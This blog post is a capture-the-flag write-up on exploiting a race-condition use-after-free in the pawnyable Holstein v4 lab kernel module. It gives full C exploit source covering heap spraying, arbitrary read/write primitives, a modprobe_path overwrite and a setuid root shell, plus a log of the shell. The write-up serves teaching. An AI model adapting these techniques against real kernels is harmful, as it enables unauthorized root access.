Linux Kernel Exploitation: Exploiting race-condition + UAF

29 Jan 2024

Intro
Vulnerability analysis
Race to get double file descriptor
Racing on multiple CPUs
Heap spraying
AAR and AAW primitives
On the way to root
Overwriting modprobe_path
Lazy trick to spawn a shell
Full exploit
References

Intro

Welcome to my third post on Linux kernel exploitation; be sure to check out part 1 and part 2. In this post, I will go over my exploit for the Holstein v4: Race Condition challenge from pawnyable.cafe.

Vulnerability analysis

In this challenge we are presented with a vulnerable kernel module, vuln.ko. It defines handlers for the open, read, write and close operations.

It also has some global variables:

int mutex = 0;
char *g_buf = NULL;

Let’s take a look at the module_open function:

static int module_open(struct inode *inode, struct file *file)
{
    printk(KERN_INFO "module_open called\n");

    if (mutex) {
        printk(KERN_INFO "resource is busy");
        return -EBUSY;
    }
    mutex = 1;

    g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
    if (!g_buf) {
        printk(KERN_INFO "kmalloc failed");
        return -ENOMEM;
    }

    return 0;
}

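Here the function uses the mutex variable to prevent g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL) from being called more than once, i.e. to stop the device from being opened twice at the same time. Note that mutex is just a plain int, not a real lock: checking it (if (mutex)) and setting it (mutex = 1) are two separate steps, and nothing makes them atomic.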

Next, let’s take a look at the module_close function:

static int module_close(struct inode *inode, struct file *file)
{
    printk(KERN_INFO "module_close called\n");
    kfree(g_buf);
    mutex = 0;
    return 0;
}

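This function frees the memory pointed to by g_buf and resets mutex, but it never sets g_buf back to NULL, so the global pointer keeps pointing to the freed chunk.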

These two functions alone pose a big security threat. module_open tries to prevent the device from being opened twice, which would otherwise let an attacker free g_buf through one file descriptor and keep using it through the other. However, because the check and the update of mutex are not atomic, there is a small window in which two threads running on different CPUs can both see mutex == 0 and both succeed in opening the device. Both file descriptors then use the same global g_buf (the first buffer is simply leaked when the second kzalloc overwrites the pointer). If we close one file descriptor, g_buf is freed, and we can keep using the other one for a use-after-free!
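To make the bug concrete, here is a minimal userspace model of the difference between the module’s check-then-set and an atomic test-and-set. It is a sketch under assumptions: it uses C11 atomics and POSIX threads instead of kernel primitives, and busy, try_open and race_openers are hypothetical names. Because the check and the update happen in a single compare-and-swap, at most one of the concurrent “openers” can ever win:

```c
#include <pthread.h>
#include <stdatomic.h>

/* Hypothetical userspace stand-in for the module's global "mutex" flag. */
static atomic_int busy = 0;
static atomic_int winners = 0;

/* Check and set in ONE atomic step: only a caller that observes
 * busy == 0 gets to store 1, so two threads can never both succeed. */
static int try_open(void) {
    int expected = 0;
    return atomic_compare_exchange_strong(&busy, &expected, 1);
}

static void *opener(void *arg) {
    (void)arg;
    if (try_open())
        atomic_fetch_add(&winners, 1);
    return NULL;
}

/* Start up to 64 threads that all try to "open" at once; return how many won. */
int race_openers(int n) {
    pthread_t th[64];
    int started = 0;

    if (n > 64)
        n = 64;
    atomic_store(&busy, 0);
    atomic_store(&winners, 0);

    for (int i = 0; i < n; i++)
        if (pthread_create(&th[started], NULL, opener, NULL) == 0)
            started++;
    for (int i = 0; i < started; i++)
        pthread_join(th[i], NULL);

    return atomic_load(&winners);
}
```

With the module’s plain int flag (if (busy) return; busy = 1;) the same harness can occasionally report two winners, which is exactly the window the exploit races for.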

The other two functions, module_read and module_write, are pretty straightforward. They read or write at most 0x400 (BUFFER_SIZE) bytes from/to g_buf.

static ssize_t module_read(struct file *file,
                           char __user *buf, size_t count,
                           loff_t *f_pos)
{
    printk(KERN_INFO "module_read called\n");

    if (count > BUFFER_SIZE) {
        printk(KERN_INFO "invalid buffer size\n");
        return -EINVAL;
    }

    if (copy_to_user(buf, g_buf, count)) {
        printk(KERN_INFO "copy_to_user failed\n");
        return -EINVAL;
    }

    return count;
}

static ssize_t module_write(struct file *file,
                            const char __user *buf, size_t count,
                            loff_t *f_pos)
{
    printk(KERN_INFO "module_write called\n");

    if (count > BUFFER_SIZE) {
        printk(KERN_INFO "invalid buffer size\n");
        return -EINVAL;
    }

    if (copy_from_user(g_buf, buf, count)) {
        printk(KERN_INFO "copy_from_user failed\n");
        return -EINVAL;
    }

    return count;
}

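Since both file descriptors share g_buf, these functions let us keep accessing the chunk after one of them is closed: reading it back once a kernel object has reclaimed the freed memory leaks kernel pointers (which bypasses KASLR), and writing it lets us modify that object.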
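Concretely, the full exploit below reads the whole 0x400-byte chunk through fd2 once a tty_struct occupies it and derives two values: the qword at index 73 minus 0x332da0 gives the kernel base, and the qword at index 7 (a pointer back into the chunk itself) minus 0x38 gives g_buf. The sketch below only factors that arithmetic into a helper; the indices and offsets are the exploit’s and are specific to this challenge’s kernel build, parse_leak is a hypothetical name, and the alignment/range checks are an added assumption rather than part of the original exploit:

```c
#include <stdint.h>
#include <string.h>

/* Offsets taken from the full exploit; valid only for this kernel build. */
#define LEAK_KTEXT_IDX 73        /* qword holding a kernel image pointer */
#define LEAK_KTEXT_OFF 0x332da0  /* its distance from the kernel base    */
#define LEAK_HEAP_IDX  7         /* qword pointing back into the chunk   */
#define LEAK_HEAP_OFF  0x38      /* its distance from the chunk start    */

struct leak {
    uint64_t kbase;
    uint64_t g_buf;
};

/* Hypothetical helper: derive kbase and g_buf from a 0x400-byte dump read
 * through the dangling fd. Returns 0 on success, -1 if the values look bogus. */
int parse_leak(const unsigned char dump[0x400], struct leak *out) {
    uint64_t q[0x400 / 8];
    memcpy(q, dump, sizeof(q));  /* avoid unaligned/aliasing casts */

    out->kbase = q[LEAK_KTEXT_IDX] - LEAK_KTEXT_OFF;
    out->g_buf = q[LEAK_HEAP_IDX] - LEAK_HEAP_OFF;

    /* Added sanity checks (assumption): the kernel base is page aligned and
     * both values are kernel addresses (top bit set on x86_64). */
    if (out->kbase & 0xfff)
        return -1;
    if (!(out->kbase >> 63) || !(out->g_buf >> 63))
        return -1;
    return 0;
}
```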

Race to get double file descriptor

The first thing our exploit needs is two file descriptors to the device open at the same time. To get them, we need two threads racing against each other to open the device. This is what it looks like in code:

int fd1, fd2;
...
int win = 0;
void* race_fd(void *arg) {
    ...
    while (1) {
        while (!win) {
            int fd = open("/dev/holstein", O_RDWR);
            if (fd == fd2) {
                win = 1;
            }
            if (win == 0 && fd == fd1) {
                close(fd);
            }
        }
        // Other thread can still close fd, sanity check
        if (write(fd1, "A", 1) != 1 || write(fd2, "a", 1) != 1) {
            close(fd1);
            close(fd2);
            win = 0;
        } else {
            // All good
            break;
        }
    }
    return NULL;
}
...

// Check which fd will be assigned after UAF and assign them automatically
fd1 = open("/tmp", O_RDONLY);
fd2 = open("/tmp", O_RDONLY);
close(fd1);
close(fd2);
printf("[+] fd1=%d, fd2=%d\n", fd1, fd2);

// Race
pthread_create(&th1, NULL, race_fd, (void*)&t1_cpu);
pthread_create(&th2, NULL, race_fd, (void*)&t2_cpu);
pthread_join(th1, NULL);
pthread_join(th2, NULL);

// UAF
close(fd1);

This gives us two file descriptors, fd1 and fd2, that both use the same g_buf. I added a sanity check to confirm that I can indeed write through both file descriptors. Also, before racing I opened “/tmp” twice to find out which file descriptor numbers will be assigned next. Initially these values were hardcoded to 3 and 4, but I later realized that if I wanted to trigger this bug multiple times, or if the process already had other files open, the numbers would change and the exploit would become unstable.
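The probe works because POSIX requires open() to return the lowest-numbered file descriptor not currently open in the process. A standalone sketch of the same idea (predict_next_fds is a hypothetical name, and /dev/null is just an arbitrary file to open); it only holds as long as no other thread opens or closes files in between:

```c
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical helper: report which two descriptors the next two open()
 * calls will receive. open() always returns the lowest free fd, so opening
 * and immediately closing two probes reveals them. */
int predict_next_fds(int *a, int *b) {
    *a = open("/dev/null", O_RDONLY);
    *b = open("/dev/null", O_RDONLY);
    if (*a < 0 || *b < 0) {
        if (*a >= 0)
            close(*a);
        if (*b >= 0)
            close(*b);
        return -1;
    }
    close(*a);
    close(*b);
    return 0;
}
```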

Racing on multiple CPUs

For this race to succeed, at least 2 CPU cores have to be present. The number of CPU cores can be changed in the QEMU configuration:

    -smp 2

Later I will increase the number of CPU cores to test reliability.

For the race to be successful, the two threads need to run on different cores. To make sure this is always the case, we can bind each thread to a specific core using CPU sets (cpu_set_t) together with sched_setaffinity().

cpu_set_t t1_cpu, t2_cpu;

// Create CPU set
CPU_ZERO(&t1_cpu);
CPU_ZERO(&t2_cpu);
CPU_SET(0, &t1_cpu);
CPU_SET(1, &t2_cpu);

And then at the start of the racing function:

// Limit thread to one CPU
cpu_set_t *cpu_set = (cpu_set_t*)arg;
if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) {
    perror("sched_setaffinity error");
}

With these changes, the behaviour should be the same regardless of the number of CPU cores present (as long as there are at least 2). We can now increase the number of CPU cores in the QEMU configuration to test how often the race succeeds.
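To check that pinning actually took effect, a thread can ask which CPU it is running on with sched_getcpu(). The sketch below assumes glibc with _GNU_SOURCE, and pin_to_first_allowed_cpu is a hypothetical helper: it pins the calling thread to the lowest CPU in its current affinity mask instead of hard-coding CPU 0, since cgroups or containers may hide some CPUs. Passing 0 as the pid to sched_setaffinity() targets the calling thread, so the gettid() wrapper is optional here.

```c
#define _GNU_SOURCE
#include <sched.h>

/* Pin the calling thread to the lowest-numbered CPU it is currently
 * allowed to run on. Returns that CPU number, or -1 on error. */
int pin_to_first_allowed_cpu(void) {
    cpu_set_t allowed, one;

    if (sched_getaffinity(0, sizeof(allowed), &allowed))
        return -1;

    for (int cpu = 0; cpu < CPU_SETSIZE; cpu++) {
        if (!CPU_ISSET(cpu, &allowed))
            continue;
        CPU_ZERO(&one);
        CPU_SET(cpu, &one);
        /* pid 0 means "the calling thread" */
        if (sched_setaffinity(0, sizeof(one), &one))
            return -1;
        return cpu;
    }
    return -1;
}
```

After a successful call, sched_getcpu() should report the returned CPU, which makes a handy debug print inside race_fd() or spray_thread().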

Heap spraying

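Heap spraying on multiple CPU cores is a bit tricky. This is because the SLUB allocator keeps a per-CPU cache, so a chunk freed on one CPU is most likely handed out again to an allocation made on that same CPU. For that reason, we use the trick from above to bind the spraying thread to a single CPU, and we free the previous spray’s allocations before retrying. I used tty_struct again for this heap spray (opening /dev/ptmx allocates tty_struct objects), but you can use whichever object gives you RIP control.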

void* spray_thread(void *arg) {
    int x;
    long spray[800];

    // Limit thread to one CPU
    cpu_set_t *cpu_set = (cpu_set_t*)arg;
    if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) {
        perror("sched_setaffinity error");
    }

    for (int i = 0; i < 800; i++) {
        //usleep(10);

        spray[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY); // O_RDONLY | O_WRONLY was just O_WRONLY
        // If spray fails close all handles and return
        if (spray[i] == -1) {
            puts("[-] FAIL spray");
            for (int j = 0; j < i; j++) {
                close(spray[j]);
            }
            return (void*)-1;
        }

        // Check if spray hit the UAF area
        if (read(fd2, &x, sizeof(int)) == sizeof(int) && x == 0x5401) {
            printf("[+] Spray hit! x=0x%x\n", x);
            // Close all other handles
            for (int j = 0; j < i; j++) {
                close(spray[j]);
            }
            // Return fd that controls UAF area
            return (void*)spray[i];
        }
    }
    for (int i = 0; i < 800; i++) {
        close(spray[i]);
    }
    puts("[+] Spray did not hit");

    return (void*)-1;
}

Here, I also added a check for whether the spray hit the use-after-free area: after each allocation, I read the first 4 bytes through fd2 and check whether they match the tty_struct magic number, TTY_MAGIC (0x5401).

struct tty_struct {
    int magic;
    ...
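The retry logic in the full exploit (spray while pinned to CPU 0, then keep spraying from a new thread pinned to CPU 1 until the magic value shows up) can be generalized to try every CPU the process is allowed to use. This is a sketch under assumptions: spray_fn stands in for a function like spray_thread() that returns the victim fd or -1, the pinning happens in a fresh thread so the caller’s own affinity is left alone, and spray_on_each_cpu, report_cpu and always_miss are hypothetical names (the last two are dummies so the driver can be tried without the vulnerable kernel):

```c
#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>

/* Stand-in for spray_thread()'s body: returns a victim fd, or -1 on a miss. */
typedef long (*spray_fn)(void);

struct spray_job {
    int cpu;
    spray_fn fn;
    long result;
};

/* Thread body: pin to job->cpu first, so the spray allocations are served
 * from that CPU's SLUB per-CPU cache, then run the spray. */
static void *spray_pinned(void *arg) {
    struct spray_job *job = arg;
    cpu_set_t set;

    CPU_ZERO(&set);
    CPU_SET(job->cpu, &set);
    if (sched_setaffinity(0, sizeof(set), &set)) {
        job->result = -1;
        return NULL;
    }
    job->result = job->fn();
    return NULL;
}

/* Try each allowed CPU in turn; return the first result that is not -1
 * and store the CPU it came from in *hit_cpu. */
long spray_on_each_cpu(spray_fn fn, int *hit_cpu) {
    cpu_set_t allowed;

    if (sched_getaffinity(0, sizeof(allowed), &allowed))
        return -1;

    for (int cpu = 0; cpu < CPU_SETSIZE; cpu++) {
        if (!CPU_ISSET(cpu, &allowed))
            continue;
        struct spray_job job = { cpu, fn, -1 };
        pthread_t th;
        if (pthread_create(&th, NULL, spray_pinned, &job))
            continue;
        pthread_join(th, NULL);
        if (job.result != -1) {
            *hit_cpu = cpu;
            return job.result;
        }
    }
    return -1;
}

/* Dummy spray functions for trying the driver outside the VM. */
static long report_cpu(void) { return sched_getcpu(); }
static long always_miss(void) { return -1; }
```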

AAR and AAW primitives

For the AAR and AAW primitives I used the same functions as in the previous post, except that I saved the fd of the sprayed object so I don’t have to loop over all spawned objects. I sacrificed the bytes starting at position 127*8 (offset 0x3f8) to store the ROP gadget, because I wanted to use the same chunk that I use to trigger the read/write. Since tty_struct is smaller than the 0x400-byte chunk it is allocated in, these bytes most likely lie past its last member, port (shown below), and in my testing overwriting them did not crash the kernel.

struct tty_struct {
    ...
    struct tty_port *port;
} __randomize_layout;
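The two values written by the primitives below follow from the layout of the fake object. In the v5.15 headers, tty_struct->ops sits right after magic, kref, dev and driver, at offset 0x18 (qword index 3), and ioctl is entry 12 of struct tty_operations in include/linux/tty_driver.h (offset 0x60). Setting p[3] = g_buf + 0x3f8 - 12*8 therefore makes the kernel fetch ops->ioctl from g_buf + 0x3f8, which is p[127], where the gadget is stored. A sketch of that arithmetic, with hypothetical helper names and a local array standing in for the chunk in kernel memory:

```c
#include <stdint.h>

#define TTY_OPS_IDX    3  /* tty_struct->ops at offset 0x18 (v5.15 layout) */
#define TTY_IOCTL_IDX 12  /* tty_operations->ioctl is pointer #12          */
#define GADGET_IDX   127  /* last qword of the 0x400-byte chunk (0x3f8)    */

/* Hypothetical helper mirroring AAR64/AAW32: patch a copy of the leaked
 * chunk so that ops->ioctl resolves to `gadget`. */
void build_fake_ops(uint64_t chunk[0x400 / 8], uint64_t g_buf, uint64_t gadget) {
    chunk[GADGET_IDX] = gadget;
    /* The fake ops table starts 12 qwords before the gadget slot. */
    chunk[TTY_OPS_IDX] = g_buf + GADGET_IDX * 8 - TTY_IOCTL_IDX * 8;
}

/* Model of what the kernel does on ioctl(): follow ops, then load the
 * ioctl slot. `chunk` is the local copy standing in for memory at g_buf.
 * Returns 0 if the slot falls outside the chunk. */
uint64_t resolve_ioctl(const uint64_t chunk[0x400 / 8], uint64_t g_buf) {
    uint64_t slot = chunk[TTY_OPS_IDX] + TTY_IOCTL_IDX * 8; /* &ops->ioctl */
    if (slot < g_buf || slot - g_buf + 8 > 0x400)
        return 0;
    return chunk[(slot - g_buf) / 8];
}
```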

Here is the code for AAR and AAW.

long long AAR64(long long addr, int fd) {
    long long* p = (long long*)&buf;

    p[127] = mov_rax_ptr_rdx;
    p[3] = g_buf + 0x3f8 - 12*8;

    write(fd2, buf, 0x400);

    return ioctl(fd, 0, addr);
}

void AAW32(long long addr, unsigned int val, int fd) {
    long long* p = (long long*)&buf;

    p[127] = mov_ptr_rdx_ecx;
    p[3] = g_buf + 0x3f8 - 12*8;

    write(fd2, buf, 0x400);

    ioctl(fd, val, addr);
}

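I also changed AAR to a 64-bit version, since I found the gadget mov rax, qword ptr [rdx] and RDX is the register I have full 8-byte control over. I wanted to do the same with AAW, but with ioctl() I can only control RDX (8 bytes) and ECX (4 bytes). One caveat on the read side: tty_operations.ioctl is declared to return int, tty_ioctl() stores its result in an int, and glibc’s ioctl() wrapper returns int as well, so most likely only the low 32 bits of RAX make it back to userspace. AAR64 is not used by the final exploit, so this does not affect it.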
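If a full 64-bit read is needed, a common workaround is to do two 32-bit reads and stitch them together. A sketch, assuming a 32-bit read primitive with the hypothetical signature read32(addr) (for example one built on a gadget of the form mov eax, dword ptr [rdx], which I have not checked for in this kernel); the mock primitive reads from a local buffer only so the helper can be exercised outside the VM:

```c
#include <stdint.h>
#include <string.h>

/* Assumed 32-bit arbitrary-read primitive; hypothetical signature. */
typedef uint32_t (*read32_fn)(uint64_t addr);

/* x86_64 is little-endian: the low half is at addr, the high half at addr+4. */
uint64_t read64_via_read32(read32_fn read32, uint64_t addr) {
    uint64_t lo = read32(addr);
    uint64_t hi = read32(addr + 4);
    return lo | (hi << 32);
}

/* Mock primitive over a local buffer standing in for kernel memory. */
static unsigned char fake_mem[64];
static uint32_t mock_read32(uint64_t addr) {
    uint32_t v;
    memcpy(&v, fake_mem + addr, sizeof(v));
    return v;
}
```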

On the way to root

With a successful bug trigger and the primitives in place, I tried to pivot to a ROP chain as described in the author’s solution. But there was an issue with my exploit: I couldn’t reliably trigger the use-after-free twice in a row, so I took a different approach. First, I tried setting the thread’s name and scanning the heap for it, but the scan took forever and the string was never found. I’m guessing it has to do with using more CPU cores and SLUB having a per-CPU cache, but I’m still not sure why it didn’t work. In the end I overwrote modprobe_path to get root.
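For reference, the thread-name idea relies on prctl(PR_SET_NAME) copying up to 15 characters plus a terminating NUL into the comm field of the calling thread’s task_struct, so a unique name acts as a marker that an arbitrary read can search for. A sketch of both halves, assuming memory has already been dumped to userspace in chunks with the read primitive; the marker and helper names are hypothetical, and memmem() is a GNU extension:

```c
#define _GNU_SOURCE
#include <string.h>
#include <sys/prctl.h>

/* TASK_COMM_LEN is 16: 15 characters plus the terminating NUL. */
#define COMM_LEN 16

/* Give the calling thread a recognizable name (the marker). */
int set_marker_name(const char *marker) {
    return prctl(PR_SET_NAME, (unsigned long)marker, 0, 0, 0);
}

/* Read the calling thread's name back into a 16-byte buffer. */
int get_thread_name(char out[COMM_LEN]) {
    return prctl(PR_GET_NAME, (unsigned long)out, 0, 0, 0);
}

/* Search one dumped chunk for the marker; returns the byte offset of the
 * first match, or -1 if it is not there. */
long find_marker(const unsigned char *dump, size_t len, const char *marker) {
    const void *hit = memmem(dump, len, marker, strlen(marker));
    return hit ? (long)((const unsigned char *)hit - dump) : -1;
}
```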

Overwriting modprobe_path

Overwriting modprobe_path is pretty straightforward; I explained it in a bit more detail in the previous article. To find the address of modprobe_path, you can load the vmlinux binary and search for the string "/sbin/modprobe".

In [1]: from pwn import *

In [2]: kernel = ELF("./vmlinux")
[*] '/home/stupid/pawnyable-cafe/LK01-4/qemu/vmlinux'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0xffffffff81000000)
    Stack:    Executable
    RWX:      Has RWX segments

In [3]: hex(next(kernel.search(b"/sbin/modprobe")))
Out[3]: '0xffffffff81e384c0'
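Because vmlinux is linked at 0xffffffff81000000 (the PIE line above) and plain KASLR shifts the whole kernel image by one offset, the static address turns into a fixed offset from the kernel base. That is where the modprobe_path (kbase + 0xe384c0) define in the full exploit comes from. A sketch of the conversion, using the kbase leaked in the sample run as input; the helper names are hypothetical:

```c
#include <stdint.h>

/* Link-time base of vmlinux, as reported by pwntools. */
#define VMLINUX_LINK_BASE 0xffffffff81000000ULL

/* Offset of a symbol from the start of the kernel image. */
uint64_t kernel_offset(uint64_t static_addr) {
    return static_addr - VMLINUX_LINK_BASE;
}

/* Runtime address = leaked kernel base + static offset. */
uint64_t runtime_addr(uint64_t kbase, uint64_t static_addr) {
    return kbase + kernel_offset(static_addr);
}
```

For example, with kbase = 0xffffffff84600000, modprobe_path ends up at 0xffffffff854384c0.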

Now what’s left is to decide which program you want to run instead of modprobe. I looked through GTFOBins for inspiration on a program that would give me an instant shell, but all the candidates needed to be run with sudo, and sudo was not available inside my QEMU instance. It seemed like the only way to spawn a shell was to write another C program and call it.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    printf("[+] getuid() returns %d\n", geteuid());
    setuid(0);
    setgid(0);
    system("/bin/sh");

    return 0;
}
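The userland half of the modprobe_path trick, which the full exploit performs with system("echo -e ..."), can also be written with plain file I/O, which avoids depending on how the shell’s echo handles -e and escape sequences. A sketch under assumptions: the target directory is a parameter so it can be tried outside the VM (the exploit itself uses /tmp), drop_modprobe_files and write_exec_file are hypothetical names, and the script body mirrors the exploit’s. Executing the a file is what makes the kernel fail to find a handler for the 0xff magic bytes and fall back to running modprobe_path as root.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write `len` bytes to `path` and make it executable (0755). */
static int write_exec_file(const char *path, const void *data, size_t len) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, len);
    close(fd);
    if (n != (ssize_t)len)
        return -1;
    return chmod(path, 0755); /* the O_CREAT mode is filtered by umask */
}

/* Drop <dir>/xx (the script modprobe_path will point to) and <dir>/a
 * (a file with an unknown binary format that triggers it). */
int drop_modprobe_files(const char *dir) {
    static const char script[] =
        "#!/bin/sh\n"
        "chown root:root /exploit\n"
        "chmod 4555 /exploit\n";
    static const unsigned char trigger[] = { 0xff, 0xff, 0xff, 0xff };
    char path[256];

    snprintf(path, sizeof(path), "%s/xx", dir);
    if (write_exec_file(path, script, sizeof(script) - 1))
        return -1;

    snprintf(path, sizeof(path), "%s/a", dir);
    return write_exec_file(path, trigger, sizeof(trigger));
}
```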

Lazy trick to spawn a shell

Then I got an idea: why not hide the code inside the exploit itself?

I thought about dropping another file on the system from my exploit, but then I realized I could just make the exploit behave differently when an argument is passed to it.

So I added a check at the start of the main() function to see if argc == 2 (i.e. one argument is passed). This way, calling "./exploit whatever" runs only the “drop to a shell” code instead of the whole exploit. Since the script that modprobe_path points to makes /exploit owned by root and setuid (chmod 4555), re-running it as "/exploit a" starts with an effective UID of 0.

int main(int argc, char **argv) {
    // Too lazy to write separate program to spawn a shell
    if (argc == 2) {
        printf("[+] getuid() returns %d\n", geteuid());
        setuid(0);
        setgid(0);
        system("/bin/sh");
        return 0;
    }

    // Normal exploit path
    int victim_fd = trigger_race_condition_uaf();
    ...
    puts("[+] Overwrote modprobe_path...");
    ...
    puts("[+] Spawning a shell");
    system("/exploit a");

And with that the exploit is complete!

Starting syslogd: OK
Starting klogd: OK
Running sysctl: OK
Saving random seed: OK
Starting network: OK
Starting dhcpcd...
dhcpcd-9.4.1 starting
no interfaces have a carrier
forked to background, child pid 101

Boot took 5.00 seconds

[ Holstein v4 (KL01-4) - Pawnyable ]
/ $ id
uid=1000 gid=1000 groups=1000
/ $ ./exploit 
[+] fd1=3, fd2=4
[+] Spray did not hit
[+] Spraying on another CPU...
[+] Spray hit! x=0x5401
[+] Spray successful! victim_fd=5
[+] leaked kbase = 0xffffffff84600000
[+] leaked g_buf = 0xffff8e6f81aa1c00
[+] Overwrote modprobe_path...
/tmp/a: line 1: ����: not found
[+] Spawning a shell
[+] getuid() returns 0
/ # id
uid=0(root) gid=0(root) groups=1000
/ # 

Full exploit

Here is the full exploit code. There is still room for improvement to make it more reliable.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <sys/prctl.h>
#include <pthread.h>
#include <sched.h>

#define mov_rax_ptr_rdx (kbase + 0x3c27b9) // mov rax, qword ptr [rdx] ; ret 
#define mov_ptr_rdx_ecx (kbase + 0x109ed) // mov dword ptr [rdx], ecx ; ret
#define modprobe_path (kbase + 0xe384c0)

int fd1, fd2;
long long user_cs, user_rflags, user_rsp, user_ss;
long long kbase, g_buf;
char buf[0x400];

// Wrapper around syscall to get thread id
pid_t gettid(void) {
    return syscall(SYS_gettid);
}

int win = 0;
void* race_fd(void *arg) {
    // Limit thread to one CPU
    cpu_set_t *cpu_set = (cpu_set_t*)arg;
    if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) {
        perror("sched_setaffinity error");
    }

    while (1) {
        while (!win) {
            int fd = open("/dev/holstein", O_RDWR);
            if (fd == fd2) {
                win = 1;
            }
            if (win == 0 && fd == fd1) {
                close(fd);
            }
        }
        // Other thread can still close fd, sanity check
        if (write(fd1, "A", 1) != 1 || write(fd2, "a", 1) != 1) {
            close(fd1);
            close(fd2);
            win = 0;
        } else {
            // All good
            break;
        }
    }
    return NULL;
}

void* spray_thread(void *arg) {
    int x;
    long spray[800];

    // Limit thread to one CPU
    cpu_set_t *cpu_set = (cpu_set_t*)arg;
    if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) {
        perror("sched_setaffinity error");
    }

    for (int i = 0; i < 800; i++) {
        //usleep(10);

        spray[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY); // O_RDONLY | O_WRONLY was just O_WRONLY
        // If spray fails close all handles and return
        if (spray[i] == -1) {
            puts("[-] FAIL spray");
            for (int j = 0; j < i; j++) {
                close(spray[j]);
            }
            return (void*)-1;
        }

        // Check if spray hit the UAF area
        if (read(fd2, &x, sizeof(int)) == sizeof(int) && x == 0x5401) {
            printf("[+] Spray hit! x=0x%x\n", x);
            // Close all other handles
            for (int j = 0; j < i; j++) {
                close(spray[j]);
            }
            // Return fd that controls UAF area
            return (void*)spray[i];
        }
    }
    for (int i = 0; i < 800; i++) {
        close(spray[i]);
    }
    puts("[+] Spray did not hit");

    return (void*)-1;
}

int trigger_race_condition_uaf() {
    pthread_t th1, th2;
    long victim_fd = -1;
    int x;

    cpu_set_t t1_cpu, t2_cpu;

    // Create CPU set
    CPU_ZERO(&t1_cpu);
    CPU_ZERO(&t2_cpu);
    CPU_SET(0, &t1_cpu);
    CPU_SET(1, &t2_cpu);

    // Check which fd will be assigned after UAF and assign them automatically
    fd1 = open("/tmp", O_RDONLY);
    fd2 = open("/tmp", O_RDONLY);
    close(fd1);
    close(fd2);
    printf("[+] fd1=%d, fd2=%d\n", fd1, fd2);

    // Race
    pthread_create(&th1, NULL, race_fd, (void*)&t1_cpu);
    pthread_create(&th2, NULL, race_fd, (void*)&t2_cpu);
    pthread_join(th1, NULL);
    pthread_join(th2, NULL);

    // UAF
    close(fd1);

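    victim_fd = (long)spray_thread((void*)&t1_cpu);
    // Initialize x before the loop condition reads it (it was uninitialized)
    read(fd2, &x, sizeof(int));

    while (victim_fd == -1 || x != 0x5401) {
        void *ret;
        puts("[+] Spraying on another CPU...");
        pthread_create(&th1, NULL, spray_thread, &t2_cpu);
        pthread_join(th1, &ret);   // pthread_join expects a void**
        victim_fd = (long)ret;
        read(fd2, &x, sizeof(int));
    }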

    printf("[+] Spray successful! victim_fd=%d\n", (int)victim_fd);
    return victim_fd;
}

long long AAR64(long long addr, int fd) {
    long long* p = (long long*)&buf;

    p[127] = mov_rax_ptr_rdx;
    p[3] = g_buf + 0x3f8 - 12*8;

    write(fd2, buf, 0x400);

    return ioctl(fd, 0, addr);
}

void AAW32(long long addr, unsigned int val, int fd) {
    long long* p = (long long*)&buf;

    p[127] = mov_ptr_rdx_ecx;
    p[3] = g_buf + 0x3f8 - 12*8;

    write(fd2, buf, 0x400);

    ioctl(fd, val, addr);
}

int main(int argc, char **argv) {
    // Too lazy to write separate program to spawn a shell
    if (argc == 2) {
        printf("[+] getuid() returns %d\n", geteuid());
        setuid(0);
        setgid(0);
        system("/bin/sh");
        return 0;
    }

    // Normal exploit path
    int victim_fd = trigger_race_condition_uaf();

    // Leak
    read(fd2, buf, 0x400);
    /*
    for (int i = 0; i < 0x400/8; i++) {
        printf("0x%llx\n", ((long long*)&buf)[i]);
    }
    */

    kbase = ((long long*)&buf)[73] - 0x332da0;
    g_buf = ((long long*)&buf)[7] - 0x38;

    // Sanity check in gdb
    //long long test = 0xcafebabecafebabe;
    //write(fd2, &test, 8);

    printf("[+] leaked kbase = 0x%llx\n", kbase);
    printf("[+] leaked g_buf = 0x%llx\n", g_buf);

    char cmd[] = "/tmp/xx\0";
    AAW32(modprobe_path, *(unsigned int*)&cmd[0], victim_fd);
    AAW32(modprobe_path + 4, *(unsigned int*)&cmd[4], victim_fd);

    puts("[+] Overwrote modprobe_path...");

    system("echo -e \"#!/bin/sh\nchown root:root /exploit\nchmod 4555 /exploit\" > /tmp/xx");
    system("chmod +x /tmp/xx");

    system("echo -e '\xff\xff\xff\xff' > /tmp/a");
    system("chmod +x /tmp/a");

    system("/tmp/a");

    puts("[+] Spawning a shell");
    system("/exploit a");

    return 0;
}

Thanks for reading!

References

https://pawnyable.cafe/linux-kernel/LK01/race_condition.html

https://elixir.bootlin.com/linux/v5.15/source/include/linux/tty.h

santaclz's blog